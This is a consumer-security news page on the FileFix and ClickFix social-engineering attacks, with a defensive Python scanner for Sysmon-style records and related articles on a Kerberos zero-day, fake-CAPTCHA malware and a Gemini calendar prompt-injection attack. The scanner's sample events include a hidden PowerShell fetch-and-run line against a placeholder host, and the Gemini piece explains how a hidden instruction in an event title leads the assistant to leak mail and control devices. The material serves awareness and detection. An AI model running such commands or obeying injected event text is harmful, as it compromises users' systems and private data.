New FileFix attack brings ClickFix social engineering to Windows File Explorer — how to stay safe

Tom's Guide, 24-06-2025
Developed by cybersecurity researcher mr.d0x, the FileFix attack is a new variant of the ever-popular ClickFix social engineering technique.
For those unfamiliar with ClickFix, it tricks users into executing malicious commands by convincing them that they need to 'fix' something in order to complete a task on their machines.
As reported by BleepingComputer, this new FileFix method uses the Windows File Explorer address bar instead. Mr.d0x not only discovered the new method but has demonstrated that it can be used in attacks to target company employees via the same social engineering techniques that have proven highly successful with ClickFix.
ClickFix attacks, which have surged in popularity recently, are browser-based and use a variety of tactics to get victims to click on a button in their browser that will copy a command to their Windows clipboard. The victim is then told to paste the command into PowerShell or prompted to perform an additional command in order to 'fix' the issue.
The lure frequently takes the form of a fake reCAPTCHA check or an error that supposedly needs to be corrected via the Win+R Run dialog. It has proven to be an extremely effective malware delivery tool, used to spread dangerous infostealers and launch ransomware attacks.
The FileFix update created by mr.d0x is similar to a typical ClickFix attack but pastes the command into Windows File Explorer, which many users are more comfortable using. File Explorer can also execute operating system commands, and it can be reached through the browser's file upload feature; the 'trick' portion of the attack is that it no longer requires an error or an issue as a lure and may simply appear as a notification for a shared file that the user needs to locate through File Explorer.
FileFix is a phishing page that includes an 'Open File Explorer' button that launches File Explorer through the file upload functionality and copies the PowerShell command to the clipboard. A fake path is what the user initially sees in the File Explorer address bar; it hides the malicious command, which is then executed.
The ClickFix tactic, which is being used in more and more attacks, works because it bypasses the best antivirus software and many other security tools: the victims end up doing most of the heavy lifting themselves, as the hackers behind this and similar campaigns use social engineering to coerce them into taking action.
The hackers behind this and similar campaigns use your preexisting knowledge and online habits to get you to do something you otherwise normally wouldn't. They might also use a sense of urgency to get you to visit one of the malicious sites used in this campaign.
If you do see a verification pop-up with instructions, close the website immediately and whatever you do, don't interact with it or follow its instructions.
Being asked to open a Terminal or Command Prompt window on your computer is a major red flag. However, not everyone is as tech-savvy, which is why you should share what you've learned with both older and younger family members, friends and colleagues to help keep them safe, too.
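A detection-side illustration of the chain the article describes, added here and not part of the Tom's Guide article or of mr.d0x's research: a small Python scanner over constructed Sysmon-style process-creation records that flags a shell launched from File Explorer or a browser together with traits of a pasted one-liner. The field names (ParentImage, Image, CommandLine) follow Sysmon Event ID 1 by assumption, and the records, the placeholder base64 and the example.invalid URL are all constructed.

```python
import re

# Parents that should rarely spawn a shell on a workstation: File Explorer
# (FileFix; the Win+R Run dialog is also hosted by explorer.exe) and browsers.
SUSPICIOUS_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Generic traits of a pasted one-liner; each is an independent signal.
TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "remote_fetch": re.compile(r"\b(?:iwr|Invoke-WebRequest|curl|DownloadString|iex|Invoke-Expression)\b", re.I),
}

# Constructed Sysmon-style (Event ID 1) records; none of these is real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r'powershell.exe -w hidden -c "iwr https://example.invalid/u.ps1 | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"},  # placeholder base64
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},  # scheduled task, benign
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},  # user opened PowerShell from the Start menu
]

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list:
    """Return the signals that make an event look like a pasted FileFix/ClickFix
    command; an empty list means the parent/child pair is not of interest."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    if image not in SHELLS or parent not in SUSPICIOUS_PARENTS:
        return []
    reasons = [f"{image} spawned by {parent}"]
    reasons += [name for name, rx in TRAITS.items() if rx.search(event["CommandLine"])]
    return reasons

def scan(events: list, min_reasons: int = 2) -> list:
    """Return (index, reasons) for events with at least min_reasons signals; the
    default of 2 keeps a user merely opening PowerShell (one signal) out of alerts."""
    hits = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in hits if len(r) >= min_reasons]
```

Lowering min_reasons to 1 surfaces every shell started from Explorer or a browser, which is noisier but useful when hunting after a confirmed lure page has been reported.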
Related Articles

Microsoft just fixed over 107 flaws including one serious zero-day — update your PC right now
Tom's Guide, 3 hours ago

Yesterday was Microsoft's August 2025 Patch Tuesday, and it was a busy one: the company issued patches for 107 vulnerabilities in total, including one zero-day flaw in Windows Kerberos. Bleeping Computer reports that thirteen of the fixed flaws were rated critical. Of those thirteen critical flaws, nine were remote code execution vulnerabilities, three were information disclosure flaws and one was an elevation of privilege. The style of bugs from the total number of vulnerabilities breaks down to:

The zero-day vulnerability (tracked as CVE-2025-53779) is a Windows Kerberos elevation of privilege vulnerability: a flaw in Kerberos that would permit an authenticated attacker to gain domain administrator privileges over a network. However, according to Microsoft, the attacker would first require elevated access to two dMSA attributes in order to exploit the vulnerability: msds-groupMSAMembership, which allows the user to utilize the dMSA, and msds-ManagedAccountPreceededByLink, where the attacker needs write access to the attribute, which allows them to specify a user that the dMSA can act on behalf of. Microsoft has attributed the discovery of the flaw to Yuval Gordon of Akamai, who published a technical report on it in May.

CAPTCHAgeddon signals a dangerous shift
Fox News, a day ago

What looks like a simple "Are you human?" check is now one of the most dangerous tricks on the internet. Fake captchas have evolved into full-blown malware launchpads, thanks to a sneaky new method called ClickFix. It copies commands to your clipboard and tricks you into running them, without ever downloading a file. This shift in attack tactics is so big that researchers are calling it "CAPTCHAgeddon." It's not just a new scam. It's a viral malware delivery system that's more convincing, stealthy, and widespread than anything before it. Let's break down how this new wave of attacks works and what makes it so hard to stop.

Back in 2024, security experts warned about fake browser update pop-ups. Victims were told to download files that turned out to be malware. But those tricks are now outdated. Enter ClickFix. Instead of asking users to install something, ClickFix loads a fake CAPTCHA screen. It looks legit, just like Google reCAPTCHA or Cloudflare's bot checks. But when you click "verify," it secretly copies a malicious PowerShell or shell script to your clipboard. From there, you're just one paste away from installing malware that steals your accounts, passwords, and files. This new trick is more convincing than any old download prompt. And it's spreading like wildfire.

Fake captchas didn't stay in sketchy ad pop-ups for long. Attackers realized they could hide these tricks in places people already trust: Each attack blends into the site or service it mimics. Some CAPTCHAs even display site logos, making the trick look like it came from the page itself. This isn't a spray-and-pray scheme anymore. It's targeted social engineering wrapped in sleek design. These aren't low-effort scams.

Attackers constantly evolve their tactics to avoid detection. Here's what makes this malware so stealthy: Attackers also serve the payloads through trusted-looking domains and even legitimate-looking JavaScript libraries.

Security researchers at Guardio didn't just look at one attack. They analyzed thousands. By clustering command structures, domains, and payload patterns, they identified multiple threat actors using similar tactics, each with a slightly different twist. Some groups use heavily obfuscated code. Others go for speed with clean, readable scripts. But all of them rely on the same core trick: fooling you into clicking something that seems harmless.

These new ClickFix scams are stealthy, convincing, and hard to detect, but you can stay safe with the right habits and tools. Here's what to do immediately:

Always run the latest version of your browser and operating system. Updates patch security holes that attackers exploit. Also, use strong antivirus software and keep it updated. The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

If a site asks you to paste a command into your terminal or browser console, stop. That's the main delivery method for ClickFix malware. Legitimate services will never ask you to do this.

Phishing campaigns are hiding fake CAPTCHAs in legit-looking URLs on Reddit, GitHub, and even news sites. Always hover over links before clicking and double-check the domain, especially if prompted to "verify you're human."

These attacks often target users whose emails or personal details are already circulating online. These services can reduce your digital footprint by requesting removal from data broker sites. While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren't cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It's what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

Modern browsers like Brave, Chrome, Firefox, Safari, and Opera offer real-time protection that blocks malicious websites, including fake CAPTCHA pages. Microsoft Edge also includes strong phishing defenses through its SmartScreen filter. Make sure features like Enhanced Safe Browsing or SmartScreen are turned on. These tools detect threats before you click, giving you a critical layer of defense.

Password managers don't just store your logins; they can also alert you when a site looks suspicious. If your manager won't autofill a password on a CAPTCHA screen or login page, that's a red flag. It usually means the site isn't recognized as legitimate. This small moment of hesitation can help you avoid falling for a scam.

If you land on a shady CAPTCHA page, don't just close the tab; report it. Most browsers have a "Report a security issue" option, or you can use Google Safe Browsing. Flagging malicious pages helps stop the scam from spreading and protects others from falling victim to the same trap.

Most people don't know about these clipboard-based attacks. Share this article and talk about it. Raising awareness can stop the scam from spreading.

CAPTCHAgeddon marks a turning point. Malware isn't just hiding in shady downloads anymore. It's hiding in plain sight, on familiar websites, in trusted apps, and inside the buttons you click every day. This trend replaces the fake browser update scam entirely. It's smarter, faster, and harder to detect. And unless we understand how it spreads, it will only grow. Security now means thinking twice about the everyday. Even a CAPTCHA.

Google Calendar bug uses Gemini to take over smart home devices and steal user data
Tom's Guide, 2 days ago

Researchers have found a flaw that allows malicious Google Calendar invites to hijack Gemini in order to wreak havoc on a target's machine. As reported by Bleeping Computer, a maliciously crafted invite within Google Calendar can remotely take over Gemini agents without any user involvement beyond typical day-to-day interaction with the assistant.

The security researchers at SafeBreach, who demonstrated this attack in a report, were able to send a calendar invite with an embedded prompt injection, hidden in the event title, which permitted them to exfiltrate a variety of user data such as email content and Calendar information. They were also able to track the victim's location, control smart home devices (using Google Home), open apps on Android and trigger Zoom calls. The researchers noted that the attack did not require white-box model access and was not blocked by Gemini's protection measures or by prompt filtering.

Instead, the attack begins with a malicious Google Calendar event invite sent to the victim, whose event title contains an indirect prompt injection. The victim then only needs to interact with Gemini as they typically would, such as asking 'What are my calendar events today?', for the AI chatbot to pull a list of events from the Calendar, which will include the malicious event title embedded by the attacker. That title then becomes part of Gemini's context window, and the assistant treats it as part of the conversation because it is unable to recognize that the instruction is malicious. Depending on what the instruction is, it could lead to a number of different actions being executed: causing events in Google Calendar to be edited or removed entirely, opening URLs to retrieve the victim's IP address, joining a Zoom call, using Google Home to control devices, or accessing emails and leaking user data.

However, it could take up to six calendar invites for this attack to work, with the malicious prompt included only in the last invite. This is because the Calendar events section displays only the five most recent events; the rest fall under the 'Show more' button. Gemini will parse them all, including the malicious one, when instructed to. Additionally, the victim will not see the malicious event title or realize there has been a compromise unless they expand the events list by clicking 'Show more.'

Gemini, Google's LLM (large language model) assistant, is integrated into Android, Google web services and Google's Workspace apps, so it has access to Gmail, Calendar and Google Home. These attacks are a downside of Google's broad access and reach: while Gemini's usefulness comes from its ability to reach across tools, this is also proving to be a detriment when it comes to this kind of attack. Google has already issued a fix and has credited the team of researchers for their efforts.
